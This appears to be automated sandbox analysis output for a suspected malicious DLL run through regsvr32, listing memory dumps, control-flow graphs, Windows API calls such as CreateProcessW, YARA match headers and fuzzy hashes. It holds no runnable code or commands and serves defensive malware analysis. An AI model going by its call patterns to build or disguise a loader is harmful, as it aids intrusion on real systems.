                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: :G$Q27$_5$yy8x$Mh
                                                                                                                                                • API String ID: 0-3587547327
                                                                                                                                                • Opcode ID: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                                                                                                • Instruction ID: f758bc8895b8ed7f582f71be29fb7142b0f1d07f9cbefdc8313849e51cf7b1d3
                                                                                                                                                • Opcode Fuzzy Hash: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                                                                                                • Instruction Fuzzy Hash: 3DF1E07051434CEBDFA9DF68C8CAA9D3BA0FF48394FA06219FD0696250D775D988CB81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 499 18000c608-18000c62d 500 18000c632-18000c637 499->500 501 18000cc8a-18000cc8f 500->501 502 18000c63d 500->502 503 18000cc95-18000cc9a 501->503 504 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 501->504 505 18000c643-18000c648 502->505 506 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 502->506 509 18000ce33-18000ced7 call 180008ad8 call 18001c32c 503->509 510 18000cca0-18000cca5 503->510 536 18000cfb4-18000d00a call 1800194a4 504->536 511 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 505->511 512 18000c64e-18000c653 505->512 539 18000cc28-18000cc85 call 1800194a4 506->539 551 18000cedc-18000cf26 call 1800194a4 509->551 516 18000cd35-18000cdce call 18000703c call 18001c32c 510->516 517 18000ccab-18000ccb0 510->517 511->500 519 18000c9c1-18000caa0 call 18002870c call 18001c32c call 1800194a4 512->519 520 18000c659-18000c65e 512->520 556 18000cdd3-18000ce2e call 1800194a4 516->556 521 18000ccb6-18000cd30 call 180021434 517->521 522 18000d00f-18000d014 517->522 519->500 524 18000c664-18000c669 520->524 525 18000c8bb-18000c963 call 180002610 call 18001c32c 520->525 521->500 522->500 538 18000d01a-18000d020 522->538 533 18000c7b2-18000c85a call 180019618 call 18001c32c 524->533 534 18000c66f-18000c674 524->534 564 18000c968-18000c9bc call 1800194a4 525->564 571 18000c85f-18000c8b6 call 1800194a4 533->571 534->522 544 18000c67a-18000c73d call 180002178 call 18001c32c 534->544 536->522 539->500 573 18000c742-18000c7ad call 1800194a4 544->573 551->500 556->500 564->500 571->500 573->500
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: +#;)$K'$sf$w\H
                                                                                                                                                • API String ID: 0-1051058546
                                                                                                                                                • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                                • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                                • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                                • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: <4P$<8$<w.
                                                                                                                                                • API String ID: 0-1030867500
                                                                                                                                                • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                                • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                                • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                                • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: %'#$'1O"
                                                                                                                                                • API String ID: 0-3508158491
                                                                                                                                                • Opcode ID: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                                                                                                • Instruction ID: 10e181b0c1a65fbc894e9b150557277c676d109d9ee8fa061bdc989f931bd19f
                                                                                                                                                • Opcode Fuzzy Hash: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                                                                                                • Instruction Fuzzy Hash: A541C471D1471C9FCB84CFA8D98AACDBBF0FB48354F249119E445B6250D3B85988CF69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: xDC
                                                                                                                                                • API String ID: 0-90241050
                                                                                                                                                • Opcode ID: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                                                                                                • Instruction ID: 9121b1bc5c885adbeef7a29f5b0494aad7ac2618abc594bea640adf26706a648
                                                                                                                                                • Opcode Fuzzy Hash: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                                                                                                • Instruction Fuzzy Hash: F391387052065CEBDB99DF68C8CAADD3BA0FB48394F906219FC4287250C775D9C98B86
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                                • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                                                • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                                • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 153 7ffc67202154-7ffc67202160 154 7ffc67202162-7ffc6720216b call 7ffc67204110 153->154 155 7ffc672021e1-7ffc672021e3 153->155 163 7ffc6720216d-7ffc6720216f 154->163 167 7ffc67202174-7ffc6720217b call 7ffc67202fa0 154->167 157 7ffc672021e5-7ffc672021ed 155->157 158 7ffc6720221e-7ffc67202221 155->158 162 7ffc672021f3-7ffc67202201 157->162 157->163 159 7ffc67202279-7ffc6720227c 158->159 160 7ffc67202223-7ffc67202232 call 7ffc67202c88 call 7ffc67203108 158->160 164 7ffc67202285 159->164 165 7ffc6720227e-7ffc67202280 call 7ffc67202f50 159->165 180 7ffc67202237-7ffc6720223d 160->180 168 7ffc67202208-7ffc6720220b 162->168 169 7ffc67202203 call 7ffc672036d0 162->169 170 7ffc6720228a-7ffc6720228f 163->170 164->170 165->164 181 7ffc67202184-7ffc672021a9 call 7ffc672040a0 GetCommandLineA call 7ffc67203eec call 7ffc67203758 167->181 182 7ffc6720217d-7ffc67202182 call 7ffc6720415c 167->182 168->164 175 7ffc6720220d-7ffc6720221c call 7ffc67203a48 call 7ffc67202c94 call 7ffc6720415c 168->175 169->168 175->164 180->163 186 7ffc67202243-7ffc67202257 FlsSetValue 180->186 202 7ffc672021ab-7ffc672021b0 call 7ffc67202c94 181->202 203 7ffc672021b2-7ffc672021b9 call 7ffc67203df4 181->203 182->163 190 7ffc67202259-7ffc6720226d call 7ffc67202cbc GetCurrentThreadId 186->190 191 7ffc6720226f-7ffc67202274 call 7ffc67203024 186->191 190->164 191->163 202->182 208 7ffc672021bb-7ffc672021c2 call 7ffc67203aec 203->208 209 7ffc672021da-7ffc672021df call 7ffc67203a48 203->209 208->209 214 7ffc672021c4-7ffc672021c6 call 7ffc6720347c 208->214 209->202 216 7ffc672021cb-7ffc672021cd 214->216 216->209 217 7ffc672021cf-7ffc672021d5 216->217 217->164
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00007FFC67204110: HeapCreate.KERNELBASE(?,?,?,?,00007FFC67202169), ref: 00007FFC67204122
                                                                                                                                                  • Part of subcall function 00007FFC67204110: HeapSetInformation.KERNEL32 ref: 00007FFC6720414C
                                                                                                                                                • _RTC_Initialize.LIBCMT ref: 00007FFC67202184
                                                                                                                                                • GetCommandLineA.KERNEL32 ref: 00007FFC67202189
                                                                                                                                                  • Part of subcall function 00007FFC67203EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC6720219B), ref: 00007FFC67203F1B
                                                                                                                                                  • Part of subcall function 00007FFC67203EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC6720219B), ref: 00007FFC67203F5B
                                                                                                                                                  • Part of subcall function 00007FFC67203758: GetStartupInfoA.KERNEL32 ref: 00007FFC6720377D
                                                                                                                                                • __setargv.LIBCMT ref: 00007FFC672021B2
                                                                                                                                                • _cinit.LIBCMT ref: 00007FFC672021C6
                                                                                                                                                  • Part of subcall function 00007FFC67202C94: FlsFree.KERNEL32(?,?,?,?,00007FFC67202217), ref: 00007FFC67202CA3
                                                                                                                                                  • Part of subcall function 00007FFC67202C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFC67202217), ref: 00007FFC67206A32
                                                                                                                                                  • Part of subcall function 00007FFC67202C94: free.LIBCMT ref: 00007FFC67206A3B
                                                                                                                                                  • Part of subcall function 00007FFC67202C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFC67202217), ref: 00007FFC67206A5B
                                                                                                                                                  • Part of subcall function 00007FFC67203108: Sleep.KERNEL32(?,?,0000000A,00007FFC67202DA3,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720314D
                                                                                                                                                • FlsSetValue.KERNEL32 ref: 00007FFC6720224C
                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00007FFC67202260
                                                                                                                                                • free.LIBCMT ref: 00007FFC6720226F
                                                                                                                                                  • Part of subcall function 00007FFC67203024: HeapFree.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720303A
                                                                                                                                                  • Part of subcall function 00007FFC67203024: _errno.LIBCMT ref: 00007FFC67203044
                                                                                                                                                  • Part of subcall function 00007FFC67203024: GetLastError.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720304C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1549890855-0
                                                                                                                                                • Opcode ID: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                                                                                                • Instruction ID: 69029bdde3825e8f7c9c4ff3c67fabf8883d1d7dd56574b65007290c5e20a80e
                                                                                                                                                • Opcode Fuzzy Hash: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                                                                                                • Instruction Fuzzy Hash: FE31D0A0E0D23FC6FA64A7B3592E27953D5AF6535CF105D3ADA1E452C3EE2CA440C232
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • _getptd.LIBCMT ref: 00007FFC67204CF3
                                                                                                                                                  • Part of subcall function 00007FFC6720497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FFC67204D0E,?,?,?,?,?,00007FFC67204EE3), ref: 00007FFC672049A6
                                                                                                                                                  • Part of subcall function 00007FFC6720309C: Sleep.KERNEL32(?,?,00000000,00007FFC67206B19,?,?,00000000,00007FFC67206BC3,?,?,?,?,?,?,00000000,00007FFC67202DC8), ref: 00007FFC672030D2
                                                                                                                                                • free.LIBCMT ref: 00007FFC67204D7F
                                                                                                                                                  • Part of subcall function 00007FFC67203024: HeapFree.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720303A
                                                                                                                                                  • Part of subcall function 00007FFC67203024: _errno.LIBCMT ref: 00007FFC67203044
                                                                                                                                                  • Part of subcall function 00007FFC67203024: GetLastError.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720304C
                                                                                                                                                • _lock.LIBCMT ref: 00007FFC67204DB7
                                                                                                                                                • free.LIBCMT ref: 00007FFC67204E67
                                                                                                                                                • free.LIBCMT ref: 00007FFC67204E97
                                                                                                                                                • _errno.LIBCMT ref: 00007FFC67204E9C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1264244385-0
                                                                                                                                                • Opcode ID: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                                                                                                • Instruction ID: bb400c60e521675ad09fee0f352d75567c7a930b51f58f4d154e0bfb45bca795
                                                                                                                                                • Opcode Fuzzy Hash: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                                                                                                • Instruction Fuzzy Hash: 1151E13190C6AAC2E3509B67A464279B7A1FF95B5CF148A36DA5E43395CF3CE441C730
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _errno$AllocateHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 502529563-0
                                                                                                                                                • Opcode ID: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                                                                                                • Instruction ID: 40a67b19b919c9bf4a768d06eed2393dfe88d2fc4d850b129de47848f3aabd0b
                                                                                                                                                • Opcode Fuzzy Hash: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                                                                                                • Instruction Fuzzy Hash: FF115420A0D66AC5FA545BA3E46C2792390EF84798F045930EA1E077D2EE7CE480C730
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocateBoundaryDeleteDescriptorHeap
                                                                                                                                                • String ID: vb4vcW2kAW3Twaz?30
                                                                                                                                                • API String ID: 254689257-4179232793
                                                                                                                                                • Opcode ID: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                                                                                                • Instruction ID: 46ce5331c01a712f5fedbf04338f71c4686baa88d8e668889485e5b24ffe70dc
                                                                                                                                                • Opcode Fuzzy Hash: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                                                                                                • Instruction Fuzzy Hash: D921F73160CAD9C6D320CB15E4643A977A5FF88748F008935D78D87765DF7D9541CB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00007FFC672036F0: _initp_misc_winsig.LIBCMT ref: 00007FFC67203729
                                                                                                                                                  • Part of subcall function 00007FFC672036F0: EncodePointer.KERNEL32(?,?,?,00007FFC67202FAB,?,?,?,00007FFC67202179), ref: 00007FFC67203745
                                                                                                                                                • FlsAlloc.KERNEL32(?,?,?,00007FFC67202179), ref: 00007FFC67202FBB
                                                                                                                                                  • Part of subcall function 00007FFC67203108: Sleep.KERNEL32(?,?,0000000A,00007FFC67202DA3,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720314D
                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFC67202179), ref: 00007FFC67202FEC
                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00007FFC67203000
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 54287522-0
                                                                                                                                                • Opcode ID: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                                                                                                • Instruction ID: e880dbe3458ca229bb15b979c1c82b7522b2d3523eb97fabb324f71dd8c46723
                                                                                                                                                • Opcode Fuzzy Hash: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                                                                                                • Instruction Fuzzy Hash: 28012C60A0D52BC5FA14EB73986977963A1BF05728F040E38D62D862E2EE2CA485D230
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 618 180001bdc-180001cab call 1800142a0 621 180001d21-180001d64 CreateProcessW 618->621 622 180001cad-180001d1b call 18000dd70 618->622 622->621
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                • String ID: :}
                                                                                                                                                • API String ID: 963392458-2902022129
                                                                                                                                                • Opcode ID: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                                                                                                • Instruction ID: 26ea99709d6fc87808755d2915912d2f892c3b8ed2aa040ac50dc8635ae9c2e3
                                                                                                                                                • Opcode Fuzzy Hash: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                                                                                                • Instruction Fuzzy Hash: EB415A7091C7888FD7B4DF58D4857AABBE0FBC8314F108A1EE48DD7255DB7498458B82
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                • String ID: JKvDDasqwOPvGXZdqW
                                                                                                                                                • API String ID: 621844428-4059861069
                                                                                                                                                • Opcode ID: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                                                                                                • Instruction ID: 9ea0e3423afb2ff24d0febdba066af2ff2f84425a3cd058d05f90d48a54f8496
                                                                                                                                                • Opcode Fuzzy Hash: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                                                                                                • Instruction Fuzzy Hash: 57D0A76190CB81C1D6209711F81435A23A0FFC834CFC00530D6CC46314CF7CC115C750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _errno.LIBCMT ref: 00007FFC67206D0F
                                                                                                                                                  • Part of subcall function 00007FFC672066D8: DecodePointer.KERNEL32 ref: 00007FFC672066FF
                                                                                                                                                • RtlAllocateHeap.NTDLL(?,?,?,?,00000000,00007FFC6720313B,?,?,0000000A,00007FFC67202DA3,?,?,?,00007FFC67202DFF), ref: 00007FFC67206D58
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocateDecodeHeapPointer_errno
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 15861996-0
                                                                                                                                                • Opcode ID: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                                                                                                • Instruction ID: 7aeb818e277745e66dd9114f5156d892382d24fd5e7fb9b2524fed4950196bf6
                                                                                                                                                • Opcode Fuzzy Hash: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                                                                                                • Instruction Fuzzy Hash: D611C825B0C16AC6FB554B27E6AC37963A19F407DCF084D34DA1D07AC4EE6CA490C630
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _initp_misc_winsig.LIBCMT ref: 00007FFC67203729
                                                                                                                                                  • Part of subcall function 00007FFC6720755C: EncodePointer.KERNEL32(?,?,?,?,00007FFC6720373E,?,?,?,00007FFC67202FAB,?,?,?,00007FFC67202179), ref: 00007FFC67207567
                                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00007FFC67202FAB,?,?,?,00007FFC67202179), ref: 00007FFC67203745
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
